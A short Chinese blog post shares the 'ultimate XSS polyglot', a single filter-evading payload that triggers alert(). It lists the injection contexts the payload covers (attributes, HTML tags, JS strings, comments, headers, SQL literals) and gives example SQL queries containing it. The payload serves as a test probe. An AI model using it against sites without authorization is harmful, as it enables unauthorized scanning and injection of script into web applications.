一句话综合型检测XSS，

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

拿着这个Payload可检测大小写、注释、DOM等多种类型XSS

可以插入单引号，双引号，无引号的属性之中，html转义，href src属性 ,html注释<!-- --> ,可插入任意html标签内容处，<div><title><style><textarea>,可插入js脚本单引号string 双引号string 正则表达式之中，单行注释//之后，多行注释/**/之中，可插入请求头之中的参数处比如set-cookie:x= xxx，可插入sql语句中，单引号双引号都可以， 比如

 SELECT * FROM Users WHERE Username='jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e' SELECT * FROM Users WHERE Username="jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e"

 

From：https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot

__EOF__

本文作者：komomon
本文链接：https://www.cnblogs.com/forforever/p/12726295.html
关于博主：喜欢读书、旅行、爬山。评论和私信会在第一时间回复。或者直接私信我。
版权声明：本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！
声援博主：如果您觉得文章对您有帮助，可以点击文章右下角【推荐】一下。您的鼓励是博主的最大动力！